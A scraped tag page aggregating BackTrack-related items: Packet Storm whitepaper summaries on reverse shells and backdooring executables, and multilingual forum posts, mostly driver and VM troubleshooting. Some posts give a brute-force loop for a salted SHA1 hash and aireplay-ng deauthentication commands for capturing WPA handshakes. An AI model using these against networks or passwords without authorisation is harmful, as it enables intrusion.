«
Expand/Collapse
407 items tagged "BackTrack"
Related tags:
wifi [+],
vmware [+],
card [+],
metasploit [+],
Supporto [+],
windows [+],
usb [+],
root [+],
network [+],
laptop [+],
Angolo [+],
wpa [+],
nbsp [+],
error [+],
dei [+],
Tutoriales [+],
Soporte [+],
Guias [+],
Support [+],
whitepaper [+],
wep [+],
read [+],
question [+],
package [+],
nessus [+],
bt3 [+],
boot [+],
blip tv [+],
alfa [+],
airodump [+],
General [+],
wicd [+],
use [+],
tutti [+],
social engineering [+],
salve [+],
root shell [+],
pentest [+],
materiel [+],
linux [+],
kde [+],
interface [+],
intel [+],
hey guys [+],
heorot [+],
driver [+],
anyone [+],
wlan [+],
wireshark [+],
wifi card [+],
video [+],
something [+],
rtl [+],
problema [+],
privilege escalation vulnerability [+],
privilege [+],
partition [+],
mode [+],
mac address [+],
mac [+],
logiciel [+],
lan [+],
kismet [+],
internet [+],
intel pro [+],
ice [+],
hola [+],
fusion [+],
feature [+],
ettercap [+],
encryption [+],
disk [+],
cl [+],
che [+],
bssid [+],
aircrack [+],
adapter [+],
Videos [+],
Requests [+],
Ecke [+],
Anfnger [+],
Newbie [+],
Software [+],
Area [+],
work [+],
wireless adapter [+],
way [+],
vmware tools [+],
virtual machine [+],
version [+],
user [+],
usb wireless [+],
ubuntu [+],
type [+],
tutorial [+],
tp link [+],
toolkit [+],
time [+],
system [+],
svn [+],
startx [+],
ssid [+],
ssh [+],
sound [+],
softap [+],
social [+],
server [+],
security [+],
screen [+],
riesco [+],
resolution [+],
red [+],
rc2 [+],
quot quot [+],
python [+],
pyrit [+],
process [+],
priority 1 [+],
post [+],
point [+],
player [+],
perpose [+],
password [+],
paper [+],
omni antenna [+],
nvidia [+],
nothing [+],
netbook [+],
neighborhood [+],
nat [+],
monitor [+],
modprobe [+],
message code [+],
merci [+],
malicious java [+],
machine [+],
macchanger [+],
macbook [+],
m arp [+],
lukas lueg [+],
login [+],
livecd [+],
list [+],
linux host [+],
link [+],
lilo [+],
keyboard [+],
jugando [+],
java [+],
issue [+],
installing [+],
instalacin [+],
iniciar [+],
img [+],
ieee [+],
i2p [+],
hey [+],
hello everyone [+],
hdd [+],
gui [+],
grub [+],
google [+],
gnu general public license [+],
gerix [+],
generales [+],
free hack [+],
framework 4 [+],
fine [+],
fatal server error [+],
executables [+],
ethernet [+],
escalation [+],
erronous [+],
engineering [+],
dvd [+],
dual boot with windows [+],
drive [+],
dhcpd [+],
dev [+],
dell [+],
debutant [+],
cpu core [+],
connection [+],
command [+],
chipset [+],
cannot [+],
busting [+],
brute [+],
automaticamente [+],
atheros [+],
asus eeepc [+],
asus [+],
arp [+],
anybody [+],
aireplay [+],
access [+],
Generali [+],
Espace [+],
Discussions [+],
Discussioni [+],
Community [+],
quot [+],
ziggy marley [+],
york [+],
yes driver [+],
yahoo answers [+],
yahoo [+],
xrandr [+],
x protocol [+],
wpn [+],
wpa wpa2 [+],
wpa supplicant [+],
world alot [+],
workshop [+],
wordlist [+],
word list [+],
word [+],
wlassistant [+],
wirelles [+],
wireless usb adapter [+],
wireless networks [+],
wireless network adapter [+],
wireless connections [+],
wireless cards [+],
wireless card [+],
wireless adapters [+],
windows xp [+],
windows boot [+],
window button [+],
window [+],
win 7 [+],
wifu [+],
width [+],
while [+],
wep key [+],
website [+],
webfilter [+],
web filter [+],
web [+],
watt [+],
wasent [+],
wanna [+],
wan ip address [+],
walmart [+],
vulnerable systems [+],
vulnerability identification [+],
volevo [+],
voip [+],
voi [+],
vmware workstation [+],
vmnet [+],
vm player [+],
vm machine [+],
vista [+],
virtual box [+],
videoprojecteur [+],
vicky devine facing [+],
usr [+],
using [+],
username [+],
usefull info [+],
usb stick booten [+],
usb pen drive [+],
usb dongle [+],
usb devices [+],
usage [+],
urlsnarf [+],
upgrade [+],
updating [+],
unrar [+],
unetbootin [+],
una [+],
ubuntu repositories [+],
ubiquity [+],
txt [+],
tx power [+],
tshark [+],
track 3 [+],
track [+],
tping [+],
toor [+],
tool [+],
todos los diccionarios [+],
tmi [+],
til [+],
thumb drive [+],
throughput [+],
thrill ride [+],
thread [+],
thc pptp bruter [+],
thank [+],
than [+],
texas instrument [+],
texas [+],
testing [+],
telecharge [+],
tecnologie informatiche [+],
taxonomia [+],
tastiera [+],
target [+],
tar bz2 [+],
system options [+],
system boots [+],
synaptic [+],
switch [+],
suggestion [+],
sudo [+],
suceed [+],
strange problem [+],
sto [+],
station [+],
static address [+],
standalone application [+],
ssl certs [+],
ssl [+],
ssd [+],
sqlmap [+],
spoonwpa [+],
spoof [+],
sparky [+],
spanish [+],
sony vaio [+],
sono [+],
someone [+],
solid state disk [+],
software version [+],
software management system [+],
software list [+],
software link [+],
sniff [+],
small [+],
slot [+],
sleep 2 [+],
slds [+],
slackware [+],
slack [+],
simple [+],
sidejacking [+],
side [+],
shared object [+],
sha1 [+],
sha [+],
servicios de red [+],
servey [+],
serveur [+],
server connection [+],
server address [+],
sendmail [+],
sending [+],
sendemail [+],
seat [+],
sdc [+],
sdb [+],
sda [+],
scripts [+],
script kiddy [+],
script files [+],
scribs [+],
scoperta [+],
scheda [+],
sans [+],
san antonio [+],
saluto [+],
saludos [+],
salt [+],
rtt [+],
routeur [+],
rosa [+],
root login [+],
root id [+],
rj 45 [+],
rip index [+],
right direction [+],
rete wireless [+],
resolutions [+],
resolution problem [+],
reserches [+],
request [+],
repositories [+],
reporte [+],
remote exploit [+],
reference book [+],
recovery [+],
realtek [+],
reading database [+],
rasus [+],
rar [+],
radeon [+],
quindi [+],
questo [+],
queria [+],
qos [+],
python tool [+],
proxy software [+],
proxy [+],
protocol [+],
programmer [+],
programattion [+],
program settings [+],
program failure [+],
prog [+],
probleme [+],
problem thanks [+],
priv [+],
presentazione [+],
port mapping [+],
port [+],
point web [+],
png [+],
pmks [+],
play ground [+],
planning [+],
place [+],
pidgin [+],
physical id [+],
php [+],
persistenti [+],
permission [+],
period of time [+],
per [+],
penna [+],
penetration test [+],
penetration [+],
pendrive [+],
pcmcia slot [+],
pcmcia [+],
pci [+],
pasword [+],
passwordlist [+],
password thanks [+],
passport [+],
pass [+],
partions [+],
parallels [+],
pain in the ass [+],
owned [+],
output options [+],
output [+],
oracle [+],
opn [+],
openoffice [+],
old software [+],
offensive [+],
oci [+],
nuovo [+],
nubuntu [+],
ntfs partition [+],
nsc [+],
notebook adapter [+],
nombres [+],
nmap [+],
nexpose [+],
newby [+],
new mac [+],
networks [+],
networking [+],
network interfaces [+],
network card [+],
netpc [+],
netgear wpn111 [+],
netgear inc [+],
netgear [+],
necessary files [+],
nbsp nbsp nbsp nbsp nbsp [+],
napster [+],
mysqld [+],
mysql server through socket [+],
mysql [+],
mus [+],
mr. oizo [+],
mouse [+],
mount dev [+],
module assignment [+],
module [+],
modual [+],
modifiche [+],
modes [+],
mobility radeon [+],
mobile radeon [+],
mobile broadband [+],
mkdir [+],
mismatch [+],
mishap [+],
mirror [+],
minimum memory [+],
min [+],
milliwatt [+],
microsoft [+],
microphone [+],
micro code [+],
meterpreter [+],
metasploit framework [+],
menu bar [+],
menu [+],
memory requirement [+],
memory issue [+],
memory [+],
member [+],
mbr [+],
magicjack [+],
mac side [+],
mac layer [+],
lukas [+],
login root [+],
logical block [+],
loco [+],
locazioni [+],
local mysql server through socket [+],
load testing [+],
live usb [+],
listining [+],
linux wireless [+],
linux usage [+],
linux source [+],
linux security [+],
linux partition [+],
linux gnu [+],
linux distro [+],
line thanks [+],
libwiretap [+],
librarie [+],
lettes [+],
lequelle [+],
leo [+],
length [+],
len [+],
lector de cd [+],
last time [+],
lancement [+],
konsole [+],
kind [+],
keylogger [+],
kernel source [+],
kernel extensions [+],
kernel [+],
kernal [+],
kate [+],
kanotix [+],
jupiter [+],
jon [+],
jdk java [+],
jdk [+],
java virtual machine [+],
java gui [+],
jacky [+],
iwl [+],
ivs [+],
iso [+],
ipwraw [+],
ipadress [+],
ip adress [+],
internet menu [+],
interface product [+],
installation [+],
instalacion de windows [+],
instalacion [+],
instal [+],
inspiron [+],
init [+],
information systems management [+],
information [+],
index table [+],
import sys [+],
implicit declaration of function [+],
immagine [+],
imageshack [+],
imagem [+],
image [+],
identificacion [+],
ibm thinkpad x24 [+],
iam [+],
http [+],
htop [+],
htc [+],
hp pavillion [+],
how tos [+],
host port [+],
host os [+],
host machine [+],
host ip [+],
host [+],
home [+],
hidy [+],
hibernate [+],
help [+],
height [+],
hd space [+],
hd esterno [+],
hard disk [+],
hard [+],
handler [+],
hamster [+],
hallo [+],
hak [+],
hacking [+],
hack [+],
guide [+],
guida [+],
gui mode [+],
grub boot loader [+],
graphics card [+],
graphical mode [+],
graphic card [+],
gnu c compiler [+],
gma [+],
gigabit network [+],
gateway ip [+],
g mini [+],
function [+],
freeze [+],
francesco [+],
forwarding [+],
forum [+],
formatear [+],
forensics [+],
flash player 10 [+],
flag key [+],
first [+],
firefox [+],
fingerprint database [+],
filesystems [+],
file permissions [+],
file [+],
fil [+],
fdisk [+],
fatal [+],
fastweb [+],
fast track [+],
fare [+],
extreme air [+],
extracting rar files [+],
exposed [+],
exploitdb [+],
exploit [+],
experiment [+],
existe [+],
everyone [+],
etter [+],
eth [+],
etc network [+],
estimados [+],
esterno [+],
essid [+],
escaneo [+],
error while loading shared libraries [+],
error error [+],
error code 15 [+],
error array [+],
enrico [+],
english thanks [+],
empty squares [+],
empathy [+],
eeepc [+],
eee [+],
easynote [+],
dwl g520 [+],
dv4 [+],
dual core processor [+],
dual boot [+],
dsl [+],
driver version [+],
driver 1 [+],
drive cache [+],
driftnet [+],
dopo [+],
dont [+],
dongle [+],
don [+],
disque dur [+],
dispositivo usb [+],
disperato [+],
discipline [+],
directory [+],
digital switch [+],
diccionario [+],
dial up connection [+],
dhclient [+],
device boot [+],
device [+],
destination port [+],
desktop image [+],
dell mini [+],
dell inspiron b130 notebook [+],
dell inspiron [+],
delay [+],
default system [+],
default [+],
deb [+],
dbms [+],
dbi [+],
database [+],
darknet [+],
danke schon [+],
d link [+],
d i [+],
cylinder boundary [+],
critical error [+],
creator [+],
cpyrit [+],
course [+],
correct ip [+],
connectivity [+],
connectionnotestablished [+],
connection configuration [+],
connection attempt [+],
config [+],
conf [+],
conclusion [+],
computer science [+],
compaq presario [+],
compaq [+],
cmq [+],
clock time [+],
client [+],
clear [+],
cleanup [+],
classpath [+],
ciao a tutti [+],
chris hadnagy [+],
chopchop [+],
chiba [+],
chiavetta [+],
checking [+],
chap [+],
cd tools [+],
cat shadow [+],
cat group [+],
carte usb [+],
carte [+],
card work [+],
caratteri [+],
cant [+],
c station [+],
c preprocessor [+],
bypass [+],
bus [+],
buongiorno [+],
buonasera [+],
buffer space [+],
brutessh [+],
bruteforce [+],
broadcom [+],
broadband [+],
brackets [+],
bootet [+],
boot time [+],
boot screen [+],
boot record [+],
boot ini [+],
bonsoir [+],
board search [+],
bluetooth [+],
black hat [+],
bin [+],
berlin [+],
base question [+],
base interface [+],
base [+],
bar [+],
backtrack linux [+],
awus [+],
avvio [+],
auflsung [+],
audigy 2 zs [+],
audigy [+],
attena [+],
attacker [+],
ati driver [+],
athrose [+],
ath [+],
asleap [+],
array type [+],
arpspoof [+],
arphrd [+],
apic [+],
anything [+],
antonio [+],
answer [+],
analog digital [+],
amigos [+],
america [+],
amd turion [+],
alpha [+],
alice [+],
algn [+],
alex [+],
alejandro [+],
airpwn [+],
airoway [+],
airoscript [+],
airo [+],
aime [+],
aim [+],
agn [+],
affiche x [+],
adobe [+],
adminstrator [+],
administration tools [+],
address [+],
adaptor [+],
acx100 [+],
actualizar kde [+],
actualizar [+],
activerecord [+],
access point [+],
Tools [+],
Technologies [+],
Skype [+],
Italian [+],
Idiots [+],
French [+],
Forums [+],
ExploitsVulnerabilities [+],
Discussion [+],
Corner [+],
BT3final [+],
500gb hard drive [+],
10min [+],
Related [+],
Issues [+],
Hardware [+],
Howto [+],
bt4 [+],
and [+],
working [+],
NON [+],
Final [+],
pre [+],
Fixes [+],
Bugs [+],
problem [+],
Wireless [+],
xss,
xorg,
xnn,
xhydra,
xauthority,
x.,
x,
wusb54g drivers,
wusb,
wpa2,
wpa psk,
wpa key,
world,
workstation,
wireless signal,
wireless chip,
wine,
wiki,
whick,
wep keys,
wep crack,
welcome thanks,
weird reason,
voipong,
vmx,
vlc,
virtualbox,
virtual drives,
victim machine,
vdi,
utilprintf,
utilisation,
usbcore,
usb memory stick,
usb enclosure,
unwanted visitors,
unsupport,
uninstall,
type login,
tx packets,
tutto,
tous,
torrent,
todays,
tl wn,
thanks in advance,
terabyte hard drive,
tempo fa,
telnet,
technisat skystar2,
teach,
target network,
tar,
system administrator,
sur votre,
stick,
stealth scan,
sslstrip,
sr 1,
sqlite,
sound card,
souci,
solo,
snapshot,
skystar,
sku,
site,
sipdump,
sipcrack,
signal,
shared folders,
sense code,
salutation,
rx packets,
runlevel,
runi,
router,
root folder,
room quality,
room,
ressource,
reseau,
repo,
released,
reboot,
realtek semiconductor,
realse,
range error,
range,
ralink,
quiet 1,
quality,
pxe,
public ip,
pu,
proper location,
project ideas,
project,
programm,
problme,
prob,
premiere,
prefix,
posto,
porte aperte,
port 31337,
placa,
ping,
persistent changes,
pdf html,
pci bridge,
pc.after,
pc,
payload,
patch,
password list,
packet,
openvas,
oot,
ogv,
offilne,
office router,
office,
nvidia driver,
nut shell,
null,
novato,
notebook,
noob,
no prob,
networkmanager,
network wirelessly,
network security,
network interface,
network input,
network gateway,
network cards,
netwerk,
netgear wg111,
netgear router,
nesus,
need,
ndiswrapper,
native environment,
name,
n draft,
my own,
my backtrack,
msf,
mouse pointer,
money,
mon,
mode graphique,
mkfs,
missing files,
mirror mode,
minimize,
mike,
migliore,
microseconds,
microprocesseur,
mencoder,
megaupload,
matter what kind,
mainline kernel,
mail,
mac spoofing,
mac pin,
loopback,
longest time,
loge,
livebox,
listing,
linux os,
linux distributions,
linksys wusb54g,
life cd,
library,
liado,
lhost,
lavc,
las herramientas,
lan device,
la batterie,
korek,
key generator,
kernel changes,
kernel 32,
kdm,
jour,
jobby,
iwconfig,
iphone,
interval,
internet wireless,
internal hd,
interface card,
intel graphics media accelerator,
intel 945 chipset,
intel 4965,
instalando,
insmod,
initrd,
inet addr,
inet,
inalambrica,
images,
imac,
ide channel,
ich,
i ca,
hxxp,
howtos,
how to connect to a wireless network,
home directory,
high speed,
hide,
hi folks,
hhd,
hexagonal,
header error,
hardware drivers,
hardrive,
harddrive,
handshake,
habs,
guy,
grazie mille,
graphic driver,
graphic cards,
graphic,
gnome,
gmail,
gig,
ghz,
germany,
generator,
funzionante,
full,
frome,
fritz,
frame,
forum search,
flashdrive,
flash drive,
fixvesa,
finland,
final 4,
few days,
fbm,
fashion,
fantastic forum,
fact,
external switch,
external hdd,
external hd,
extentions,
exploits,
expierience,
exist il,
every,
ethical hacker,
error message,
ernest,
english,
elf,
effet,
echo on,
dwl g,
dual monitor,
dual boot windows,
drivers windows,
drive space,
download,
dock,
dns resolution,
dna finland,
directory code,
different things,
dictionnaire,
dictionary file,
dictionary attack,
desktop system,
desktop,
dependancy,
denke,
delema,
default margin,
default device,
debbi,
deb packages,
d link router,
d apple,
custom,
cuda,
crack,
couple,
console,
consola,
connect,
configuring,
conect,
con,
computer,
compatability chart,
com,
collaborative debugging tool,
cold fusion application,
code,
click,
chris,
chntpw,
chip usb,
chip set,
channel 11,
channel,
change,
cfdisk,
ces,
cerco,
cd test,
carte airport,
can,
cable side,
c drive,
busybox,
buenas,
bridge,
bozza,
bootable usb,
boot error,
bonjour,
bluetoothdialup,
blah blah,
bit,
biscotte,
better solution,
beta,
bcm,
basic linux books,
backtrak,
background,
back,
b pci,
avalible,
auth,
ati mobility,
atheros ar5007eg,
atapi device,
app,
antena,
anomalia,
amp,
amazon,
alambrica,
airforce one,
adsl,
addition,
acer,
access c,
accer,
aba,
Tutoriaux,
Release,
Public,
Latest,
BackTrack4,
64 bits,
4ghz
-
-
21:28
»
SecDocs
Authors:
Chris Hadnagy Tags:
exploiting Event:
Black Hat DC 2011 Abstract: Offensive Security wants to take you on a non-stop thrill ride through an actual hack. From Information Gathering, Social Engineering and Client Side Exploitation we will show you complete and total domination of the target. This session will showcase the skills that are taught in Offensive Security’s world-renowned Pentesting With BackTrack course as well as our Penetration Testing services. Our goal is raise awareness of the real world threats that exist in corporate business today.
-
-
6:55
»
Packet Storm Security Recent Files
This is a brief whitepaper discussing how to BackTrack 5 and the Social Engineering Toolkit (SET) to generate a malicious java applet in order to gain a reverse shell on Windows 7.
-
6:55
»
Packet Storm Security Misc. Files
This is a brief whitepaper discussing how to BackTrack 5 and the Social Engineering Toolkit (SET) to generate a malicious java applet in order to gain a reverse shell on Windows 7.
-
-
6:54
»
Packet Storm Security Recent Files
Whitepaper called Social Engineering Toolkit. This article covers backdooring executables and evading antivirus using scripts included with BackTrack.
-
6:54
»
Packet Storm Security Misc. Files
Whitepaper called Social Engineering Toolkit. This article covers backdooring executables and evading antivirus using scripts included with BackTrack.
-
-
18:01
»
Packet Storm Security Recent Files
Whitepaper called Penetration Testing Linux with Brute Forcing Tool. It discusses using Backtrack, Metasploit, and various brute forcing tools for breaking into a Linux host.
-
18:01
»
Packet Storm Security Misc. Files
Whitepaper called Penetration Testing Linux with Brute Forcing Tool. It discusses using Backtrack, Metasploit, and various brute forcing tools for breaking into a Linux host.
-
7:35
»
Packet Storm Security Misc. Files
Owned and Exposed Issue 2 - Known websites such as carders.cc, inj3ct0r, ettercap, exploit-db, backtrack and free-hack have all been compromised.
-
-
2:31
»
remote-exploit & backtrack
Estimados, k tal, le cuento tengo instalado en mi laptop Backtrack 4 final y queria saber como actualizar el KDE a la ultima version, desde ya muhas gracias.
Saludos
-
-
18:24
»
remote-exploit & backtrack
A como lo dice el tema, lamentablemente mi lector de DVD se me daño y y solo adquiri un lector de CD, necesito instalar BackTrack en mi laptop pero no se como poderle hacer ya que la bendita maquina no bootea desde USB tampoco.
Alguna sugerencia?
Slds
-
-
13:47
»
remote-exploit & backtrack
I've made myself a problem I cant figure out. . .
Code:
cat ~/.scribs/bin/ds1
#!/usr/bin/env python
import sha
import sys
SALT = sys.argv[1]
PASS = sys.argv[2]
HASH = sha.new(sha.new(SALT + PASS).hexdigest()).hexdigest()
print HASH.upper()
I have written this in python and am try to crack the pass with john, but am not sure how to tell john to encrypt with sha1 twice.
here is a sample hash:
B2CDFEA7E83FD36763E55C0FC6577D039BE005A2
Which is 'saltpass' in plain text.
I can crack it with:
Code:
for pass in `crunch 1 4 abcdefghijklmnopqrstuvwxyz0123456789 -t @@@@`;
do echo salt$pass:`ds1 salt $pass` | grep B2CDFEA7E83FD36763E55C0FC6577D039BE005A2;
done
How should I go about testing it against john? Is adding a new format and recompiling the only solution?
-
-
12:46
»
remote-exploit & backtrack
Hola a todos, resulta que siempre que enciendo el backtrack tengo que estar mandandole el comando desde root para iniciar los servicios de red.
Como puedo dejar que al iniciar backtrack estos servicios se inicien automaticamente?
-
12:43
»
remote-exploit & backtrack
Hola Amigos del foro,
Aqui vengo preguntando sobre estos dos sistemas ya que los e instalado en mi distro de Backtrack 4 y se inician despues de la instalacion y todo bien pero una ves reinicie mi maquina ya estos servicios no vuelven a estar habilitados.
Para dejarlos automaticamente como es que le puedo hacer?
O para el NeXpose como una ves instalado como puedo iniciar los servicos para entrar por la web con el GUI?
Gracias por sus respuestas!!!
-
-
3:51
»
remote-exploit & backtrack
Hi guys,
I'm using BackTrack4 in my office to run a MySql server for internal testing purposes and it's working fairly well till now with 1 inconvenience that it doesn't autostart. Sometimes I have to shutdown the server and after booting again certain parameters like ip address, mounting a separate HDD partition etc. get reset and I have to manually assign IP, mount partition, start required services like Mysql, SSH again.
Is there any way to avoid that ? That is, to assign the same network configuration, starting of certain services and auto-mounting the partition ?
For setting ip address I tried editing "
/etc/network/interfaces" like this:
Quote:
auto lo
iface lo inet loopback
face eth0 inet static
address 192.168.1.111
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1
auto eth1
iface eth1 inet dhcp
<snip>
|
For auto start of services, I edited
rc.local file and added the commands
Quote:
and so on.
But both didn't work. Can someone point out the correct way of doing it ? I read some cryptic (to me) article where they were using scripts to do similar stuff, but all that is beyond me. Even if I could somehow manage to write a script to automatically do all that in case of an unexpected reboot (which I don't know how to :o) how'll that script run by itself automatically ?
-
-
12:02
»
remote-exploit & backtrack
Ok. Here is the story..
Installed BackTrack using VMware, by downloading the .ISO not the VMware Image. Got confused by downloading the VMware imagine first..
In any case, installed it, booted up, 'ifconfig -a' but nothing is there except "eth0" and "local loopback", altough I have two wireless adapters. One being Realtek RTL8187 another being DW1501 Wireless card..
Sorry for being a noob, but how do you turn them on?
-
-
0:12
»
remote-exploit & backtrack
:confused:hi,im sorry if made new topics.and i know u saw a 100 time something like this.but im really confused and i need ur help guys.
i really dont know which one of this 2 card better for hack wirelles.compatibility with bt4 or another linux and can inject without problem and can monitor without problem and important than other which one dont need modify driver for work on bt4.
ALFA USB AWUS050NH 1000MW
or
ALFA USB AWUS036H 500MW
:confused:
-
-
10:56
»
remote-exploit & backtrack
Salve mi chiamo Francesco non riesco a capire il perchè con backtrack la risoluzione del pc riamane su 800x600 e invece con ubunru 10.04 riesco ad impostarla a 1024x600 utilizzando in entrambi i casi jupiter
-
-
19:41
»
remote-exploit & backtrack
Hi everyone, I feel like a bit of a goose regarding this issue but after searching and searching I still can't find my answer so I was hoping someone could shed some light on this for me.
The problem I am having is that when I try to output an nmap scan using metasploit for example:
msf> db_nmap -v -sV 192.168.238.100 -oA /home/output
I only get the grepable output and not the other major outputs, if I specify that I want xml output it wont produce any output at all.
However if I am using nmap as a standalone application all the output options and formats work as they should.
I'm running Backtrack 4 R1, with Metaspolit 3.4.2-dev and nmap 5.35DC1.
-
-
11:55
»
remote-exploit & backtrack
Hi guys, im a total noob so please dont flame...
I just bought this tl-wn422g with an atheros chipset and its USB.
I get it in the list of usb
but it is not in the ifconfig
how can i get it to work?
-
-
12:23
»
remote-exploit & backtrack
Hi all, quick question. I configured kismet to work with my Alfa AWUS036H USB wireless card with these configurations...
Code:
source=rt8180,wlan0,ALFA
Kismet starts up fine, but it doesn't detect any APs. Does anyone know what might be the problem? I've got it to work when I ran Linux as a host machine. But now it's running in a VM. But I hardly think that could be the problem because I let the VM take control of the card. Any suggestions? Thanx in advance.
-
0:08
»
remote-exploit & backtrack
First of all sorry about my english,
I bought an ASUS Eeepc 1005P netbook and downloaded bt4 final iso and setup a USB pen drive when i start netbook from USB, no screens found message occur then stop the working
What can i do ?
-
-
12:40
»
remote-exploit & backtrack
How good/bad does backtrack work on parallels 5? and how does it compare with running it in vmware fusion.
-
-
14:18
»
remote-exploit & backtrack
Sorry its been a while since i been here as well as use BT4-pre Final.
My question is that or may i say my concern is, i have alot of things customized and stored on my vmware with bt4-pre final installed. And since i haven't used it for a while i forgot how to use a few things....
But if i open it up as of right now, those things would comeback to memory.
Q: if i were to upgrade to backtrack 4 final, can i or will i still be able to keep everything on bt4 pre final intact ?
-such as notes, personal .sh scripts, settings, etc...
cause i dont want to upgrade and forget how to do this, that, and the third. I remember updating the kernal on bt4-pre and that was a pain in the ass, but i got through.
-
-
20:11
»
remote-exploit & backtrack
Hi
i need to run my Hard Disk ( My Passport ) on Linux BackTrack4
and thank you :)
-
-
1:28
»
remote-exploit & backtrack
Bonjour, je débute dans le wifi et j’aimerai savoir si l’alpha AWUS036H 1 watt et compatible sur backtrack 3. J’aimerai également savoir si le site suivant pour acheter cette carte usb wifi est fiable : tandco.fr.
J’aimerai savoir pourquoi l’alpha 500 milliwatt est plus cher que la 1 watt. Selon ma logique sa devrai être le contraire, non ?
Merci de me répondre.
Cordialemant,
-
-
17:07
»
remote-exploit & backtrack
after a long time trying to get pyrit to see my ATI card, i came up with this prob;
root@bt:~# pyrit list_cores
Pyrit 0.3.1-dev (svn r277) (C) 2008-2010 Lukas Lueg
pyrit - Project Hosting on Google Code
This code is distributed under the GNU General Public License v3+
The following cores seem available...
#1: 'OpenCL-Device 'Cedar''
#2: 'CPU-Core (SSE2)'
...seems fine ? ,,,except when i do the benchmark, i get this,
root@bt:~# pyrit benchmark
Pyrit 0.3.1-dev (svn r277) (C) 2008-2010 Lukas Lueg
pyrit - Project Hosting on Google Code
This code is distributed under the GNU General Public License v3+
Calibrating... Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python2.5/threading.py", line 486, in __bootstrap_inner
self.run()
File "/usr/lib/python2.5/site-packages/cpyrit/cpyrit.py", line 112, in run
self._testComputeFunction(101)
File "/usr/lib/python2.5/site-packages/cpyrit/cpyrit.py", line 101, in _testComputeFunction
self.solve(Core.TV_ESSID, [Core.TV_PW] * i))):
SystemError: Failed to build kernel (CL_BUILD_PROGRAM_FAILURE):
sh: /bin/x86/clc: No such file or directory
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python2.5/threading.py", line 486, in __bootstrap_inner
self.run()
File "/usr/lib/python2.5/site-packages/cpyrit/cpyrit.py", line 109, in run
essid, pwlist = self.queue._gather(self.buffersize, timeout=0.5)
File "/usr/lib/python2.5/site-packages/cpyrit/cpyrit.py", line 640, in _gather
self._check_cores()
File "/usr/lib/python2.5/site-packages/cpyrit/cpyrit.py", line 498, in _check_cores
raise SystemError("The core '%s' has died unexpectedly" % core)
SystemError: The core 'OpenCL-Device 'Cedar'' has died unexpectedly
Traceback (most recent call last):
File "/usr/bin/pyrit", line 6, in <module>
pyrit_cli.Pyrit_CLI().initFromArgv()
File "/usr/lib/python2.5/site-packages/pyrit_cli.py", line 116, in initFromArgv
func(self, **options)
File "/usr/lib/python2.5/site-packages/pyrit_cli.py", line 1170, in benchmark
cp.enqueue('foo', ['barbarbar'] * 500)
File "/usr/lib/python2.5/site-packages/cpyrit/cpyrit.py", line 572, in enqueue
self._check_cores()
File "/usr/lib/python2.5/site-packages/cpyrit/cpyrit.py", line 498, in _check_cores
raise SystemError("The core '%s' has died unexpectedly" % core)
SystemError: The core 'OpenCL-Device 'Cedar'' has died unexpectedly
any ideas ? ,, please help me, its took over a week to get this far !
-
16:02
»
remote-exploit & backtrack
Hello ... I am having a problem in the backtrack 3
When I search for networks for the first time I find networks but when I search for the networks again can not find any network .. And a message appears i dont know it ... Please help
-
-
15:20
»
remote-exploit & backtrack
Hey guys,
I installed my backtrack 4 final on my laptop and it was containing windows vista , in vista i was able to connect to my wireless connection easily , but when i removed vista and installed backtrack , i couldn't connect to any because it didn't even find any wireless !
I googled for that and found a lot of commands , like ifconfig wlan0 up and dhcpcd and so on , but when i enter ifconfig wlan0 up , it says that there isn't wlan0 network to up it ! ( im also using wicd manager and every time i click on Refresh it says that there isn't any wireless connection , so this issue - as i think - is about finding the wireless connection and then i think it's easy to connect if i found it )
This is my issue about the wireless , my question is how can i scan and find the wireless connection and connect to it .
Regards
Jacky
-
-
14:48
»
remote-exploit & backtrack
I receive the error:
tshark: error while loading shared libraries: libwiretap.so.0: cannot open shared object file: No such file or directory
when attempting to run tshark from the BackTrack 4 Final Release VMWare Image.
ldd tshark shows libwiretap.so.0 not found but it does exist in the /usr/lib/wireshark/ directory.
How would I point tshark to look there?
Wireshark works fine, but not tshark.
Any help much appreciated.
-
-
11:40
»
remote-exploit & backtrack
That we connect in client
lock command aireplay-ng -1 0 -a bssid -c station wlan0 is good work
but how to connect to client to find handshark
aireplay-ng -0 10 -a bssid -c station wlan0 and nothing in airodump-ng
-
6:46
»
remote-exploit & backtrack
Hi,
ich habe BackTrack 4 in einer VM laufen. Wollte mich mal ein wenig mit Metasploit befassen, doch beim updaten triff immer ein Fehler auf:
Code:
root@bt:/pentest/exploits/exploitdb# msfupdate
Updating Metasploit from metasploit.com/svn/framework3/trunk...
svn: Working copy '.' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)
Error: cleaning up the SVN directory and retrying...
svn: In directory '.'
svn: Error processing command 'modify-wcprop' in '.'
svn: 'HACKING' is not under version control
svn: Working copy '.' locked
svn: run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)
Error: please check connectivity to the following URL:
metasploit.com/svn/framework3/trunk
root@bt:/pentest/exploits/exploitdb#
Hat jemand eine Idee was das sein kann? Internet verbindung besteht aber.
Danke schon mal
-
-
9:39
»
remote-exploit & backtrack
hello im use backtrack live cd and boot in windows xp and no run stop here
(initramfs)were put here?
-
-
14:32
»
remote-exploit & backtrack
bonsoir ... j'ai deux problème avec le live-cd de backtrack 4 ... lorsque je lance le livecd j'ai acces au terminal ou il faut écrire "startx" pour lance le mode graphique ,ayant une carte graphique ati qui n'est donc pas supporté par backtrack 4 je ne peut pas avoir avec au bureau ,j'ai donc fouiné impeut sur le web et j'ai vue que l'on pouvait télécharger les drivers ati directement en lancent la commande apt-get install ati je crois enfin je ne sait pas quoi faire pour avoir soit internet soit mes drivers ati pour pouvoir utiliser backtrack pleinement ,si vous avec des questions ou des solution je suis a votre écoute ,mercis
-
-
17:37
»
remote-exploit & backtrack
Tryed to boot my bt 4 final dvd and this is the error i keep getting:
mp-bios 8254 timer not connected to IO-APIC
usb 2-2 device descriptor read/64, error -62
device not accpeting adress 4 hub
2-0:1.0: unable to enumerate usb device on port 2 buffer i/o error in device hub logical block
squashfs error: squashfs_read_data failed to read block
squashfs error unable to read id index table.
then sends me to a prompt. I tried the dvd on an older cimputer just to see if the dvd is working and it gave me a video error. So im pretty sure theres nothing wrong with the dvd. Any suggestions would be a huge help
-
8:50
»
remote-exploit & backtrack
hi all,
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 569 exploits - 285 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
